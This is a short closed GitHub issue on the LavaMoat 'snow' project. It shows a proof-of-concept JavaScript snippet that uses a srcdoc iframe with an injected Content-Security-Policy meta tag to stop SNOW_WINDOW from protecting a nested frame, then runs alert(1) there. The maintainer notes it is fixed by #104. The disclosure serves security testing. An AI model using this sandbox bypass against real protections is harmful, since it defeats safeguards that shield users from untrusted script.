Closed mmndaniel closed 1 year ago
```js
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
<iframe srcdoc="
<meta http-equiv='Content-Security-Policy' content="script-src 'nonce-pwnd' ;">
<iframe src="javascript:haha">
</iframe>
<script nonce="pwnd">frames[0].alert(1);</script>">
</iframe>`
```
Similar to https://github.com/LavaMoat/snow/issues/90 and https://github.com/LavaMoat/snow/issues/92, using CSP to prevent SNOW_WINDOW from running :)
Think I'm gonna remove srcdoc CSP attempts altogether (read further @ #104)
fixed by #104